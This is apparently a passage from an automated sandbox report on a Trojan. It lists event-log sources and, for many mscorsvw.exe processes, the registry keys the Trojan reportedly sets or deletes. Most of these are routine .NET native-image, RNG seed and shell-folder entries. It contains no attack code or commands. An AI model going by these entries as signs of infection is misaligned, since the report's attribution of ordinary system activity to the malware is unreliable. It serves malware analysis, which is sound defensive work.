"Sources" = "Service1, NetworkAnalyser[ADWARE_ROI], NetworkAnalyser[INSTALL_UN_INSTALL_STATU_SUPDATER], NetworkAnalyser[APP_SETTINGS], hwopt12052016001648_updater_service, hwopt12052016001648, WSH, WMIAdapter, WMI.NET Provider Extension, WmdmPmSN, WinMgmt, Winlogon, Windows Product Activation, Windows 3.1 Migration, WebClient, VSSetup, VSS, vmtools, vmStatsProvider, VBRuntime, Userinit, Userenv, TPVCGateway, Tlntsvr, System.ServiceModel.Install 3.0.0.0, System.ServiceModel 4.0.0.0, System.ServiceModel 3.0.0.0, System.Runtime.Serialization 4.0.0.0, System.Runtime.Serialization 3.0.0.0, System.IO.Log 4.0.0.0, System.IO.Log 3.0.0.0, System.IdentityModel 4.0.0.0, System.IdentityModel 3.0.0.0, SysmonLog, Starter, SpoolerCtrs, Software Restriction Policies, Software Installation, ServiceModel Audit 4.0.0.0, ServiceModel Audit 3.0.0.0, SecurityCenter, SclgNtfy, SceSrv, SceCli, safrslv, SAFrdms, RPC, Remote Assistance, PerlMsg, PerfProc, PerfOS, PerfNet, Perfmon, Perflib, PerfDisk, Perfctrs, Offline Files, Oakley, ntbackup, MSSQLSERVER/MSDE, MSSHA, MsiInstaller, MSDTC Client, MSDTC, mnmsrvc"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"
The process mscorsvw.exe:4020 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8B 18 F6 3A C4 4E 70 EB B1 99 4C 05 FB 13 45 79"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
The process mscorsvw.exe:3616 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "27 1F F6 AD 96 01 CB 18 7A 14 A3 28 23 1F C3 C3"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
The process mscorsvw.exe:2948 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3E 81 59 49 5F 0C 8F 69 B5 03 1A FC 4B 08 AF 04"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
The process mscorsvw.exe:3756 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\1367089b\5c]
"ConfigString" = "ZAP--0000-0000"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d40437\17ba5869\65]
"DisplayName" = "Microsoft.PowerShell.ConsoleHost,1.0.0.0,,31bf3856ad364e35"
"Status" = "4098"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF F1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d40437\17ba5869\65\InvertDependencies\13b06edc\1367089b]
"5c" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d40437\17ba5869\65]
"SIG" = "3C 55 A6 91 EF 61 21 4C 93 C9 D8 16 A5 41 D7 5A"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\13b06edc\1367089b]
"5c" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\13b06edc\1367089b]
"5c" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\1367089b\5c]
"ConfigMask" = "4361"
"ILDependencies" = "7F 93 69 55 F3 DF 09 78 61 00 00 00 01 00 00 00"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\1367089b\5c]
"DisplayName" = "Microsoft.PowerShell.ConsoleHost,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\13b06edc\1367089b]
"5c" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\1367089b\5c]
"MVID" = "DC 19 F5 0C 5E 84 E7 22 34 33 CC 70 9E 7E B4 3F"
"Status" = "0"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5e]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF F1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF F9"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\13b06edc\1367089b]
"5c" = ""
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D3 CF CC 11 E2 5E DE 62 07 7E 61 0B 09 9F 21 19"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5e]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF F9"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\30041bb6\4c\InvertDependencies\13b06edc\1367089b]
"5c" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "94"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d40437\17ba5869\65]
"LastModTime" = "20 36 83 96 CA AB D1 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\1367089b\5c]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5c]
The process mscorsvw.exe:2196 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\3eff7be6\5e]
"MVID" = "F0 07 EE 1B F5 48 BA 76 1B A6 16 F4 C3 5B 15 8E"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\30041bb6\4c\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5c]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF C1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\6abb48d8\39\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3c9c8d7b\41470f34\2\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF C1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b351479\168b424e\2b\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\3eff7be6\5e]
"DisplayName" = "Microsoft.PowerShell.Commands.Management,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\3eff7be6\5e]
"ConfigString" = "ZAP--0000-0000"
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\6fc4440f\67]
"Status" = "4098"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\3eff7be6\5e]
"Status" = "0"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\6fc4440f\67]
"SIG" = "1D 3D FC F9 F8 82 BC 47 B7 60 1D 39 80 29 76 15"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\6fc4440f\67]
"DisplayName" = "Microsoft.PowerShell.Commands.Management,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\3eff7be6\5e]
"ILDependencies" = "7F 93 69 55 F3 DF 09 78 61 00 00 00 01 00 00 00"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5c]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF E1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF E1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B8 F9 BC 87 40 0C 00 F0 EE 6A 27 04 F2 CB A9 7B"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\3eff7be6\5e]
"ConfigMask" = "4361"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "92"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\6fc4440f\67]
"LastModTime" = "9E 95 C3 96 CA AB D1 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\6fc4440f\67\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3a6a696d\638045d1\2c\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5a]
The process mscorsvw.exe:3536 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\7ac727df\3ef4663b]
"F" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\1c74b768\5f]
"ILDependencies" = "7F 93 69 55 F3 DF 09 78 61 00 00 00 01 00 00 00"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\2c28124a\68]
"Status" = "4098"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\1c74b768\5f]
"ConfigMask" = "4361"
"DisplayName" = "Microsoft.PowerShell.Commands.Diagnostics,1.0.0.0,,31bf3856ad364e35"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF 81"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\1c74b768\5f]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"
"Status" = "0"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\2c28124a\68\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\2c28124a\68]
"SIG" = "EC BB F6 79 DE 07 9A 4F A7 CE DF 48 D6 49 CE 93"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\1c74b768\5f]
"ConfigString" = "ZAP--0000-0000"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5b]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF 81"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\2c28124a\68]
"LastModTime" = "02 DE 4D 97 CA AB D1 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\3ef4663b\f\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\30041bb6\4c\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\7ac727df\3ef4663b]
"F" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF C1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\2c28124a\68]
"DisplayName" = "Microsoft.PowerShell.Commands.Diagnostics,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "77 64 A3 08 DC EE 1B 4B 3A FF 35 89 F1 B9 EB 8A"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "91"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\1c74b768\5f]
"MVID" = "13 FC 3D AE F5 85 09 8F 11 91 1F 8F 72 AC 1C EA"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5b]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF C1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\7ac727df\3ef4663b]
"F" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""
The process mscorsvw.exe:3676 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CD 7B F3 64 DF C1 DF B9 B5 5A F2 24 B6 04 70 22"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
The process mscorsvw.exe:3044 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\736e1f8\4a6241f9\5a]
"LastModTime" = "C0 88 DA 97 CA AB D1 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5a]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61]
"Status" = "4098"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\736e1f8\4a6241f9\5a]
"SIG" = "5D B3 1D FA D7 A3 2D 4A 9D D3 B0 41 D1 BC 36 E6"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\2042d09e\663d72dd]
"60" = ""
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61]
"LastModTime" = "CC 4B 58 96 CA AB D1 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\736e1f8\4a6241f9\5a]
"Status" = "4098"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2042d09e\663d72dd\60]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61]
"DisplayName" = "System.Management.Automation,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2042d09e\663d72dd\60]
"MissingDependencies" = "Microsoft.BackgroundIntelligentTransfer.Management.Interop,6.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\30041bb6\4c\InvertDependencies\2042d09e\663d72dd]
"60" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2042d09e\663d72dd\60]
"MVID" = "FD 3E DC DF A9 CE 60 AB AC 35 20 81 46 18 44 95"
"ConfigMask" = "4361"
"ConfigString" = "ZAP--0000-0000"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF 81"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\2042d09e\663d72dd]
"60" = ""
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1D D3 8E 75 48 34 76 5C 55 E2 86 D7 30 B4 AD 1E"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\2042d09e\663d72dd]
"60" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5a]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF 81"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "90"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2042d09e\663d72dd\60]
"DisplayName" = "Microsoft.BackgroundIntelligentTransfer.Management,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\736e1f8\4a6241f9\5a]
"DisplayName" = "Microsoft.BackgroundIntelligentTransfer.Management,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2042d09e\663d72dd\60]
"ILDependencies" = "7F 93 69 55 F3 DF 09 78 61 00 00 00 01 00 00 00"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61]
"SIG" = "85 42 9C 0A C5 DF B1 48 A5 8E 44 2E FB 91 9D 84"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\736e1f8\4a6241f9\5a\InvertDependencies\2042d09e\663d72dd]
"60" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2042d09e\663d72dd\60]
"Status" = "2"
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index58]
The process mscorsvw.exe:2544 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3A 4B F8 7A D3 9B AE BE A2 05 D5 D9 9E CA 3F 04"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
The process mscorsvw.exe:2564 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A2 8F 37 27 96 3F 58 8C 8A 66 AB 28 F1 64 BA ED"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2644b2e9\635b32a7\66]
"ILDependencies" = "44 18 F2 39 EC CB 26 0B 6F 00 00 00 01 00 00 00"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index64]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF E1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2644b2e9\635b32a7\66]
"ConfigMask" = "4361"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "100"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\2644b2e9\635b32a7]
"66" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2644b2e9\635b32a7\66]
"ConfigString" = "ZAP--0000-0000"
"MVID" = "9D 8E 8F 7B 7A E9 50 D8 65 44 54 05 97 83 7B 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\39f21844\b26cbec\6f\InvertDependencies\2644b2e9\635b32a7]
"66" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2644b2e9\635b32a7\66]
"DisplayName" = "Microsoft.WSMan.Runtime,1.0.0.0,,31bf3856ad364e35"
"Status" = "0"
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF FF C1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index64]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF FF C1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF E1"
"SystemStoreChangeId" = "209"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\2644b2e9\635b32a7]
"66" = ""
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index62]
The process mscorsvw.exe:1856 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F7 37 36 B9 17 3F C5 C5 03 9F 66 0C 51 42 68 5B"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
The process mscorsvw.exe:3180 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "83 8B 30 07 3E AE 3D 7B 09 B9 BB 33 22 A1 A9 7B"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
The process mscorsvw.exe:2660 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "76 26 EA 13 7F 28 5B 7E B4 1B 1F 41 DC B0 94 73"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
The process mscorsvw.exe:2508 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F6 3A 47 E4 D2 43 FE D1 F6 6F 1F D8 0C 90 B6 16"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"
The process mscorsvw.exe:2680 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7df4ed04\40209899\66\InvertDependencies\56d30baa\41c113e9]
"5d" = ""
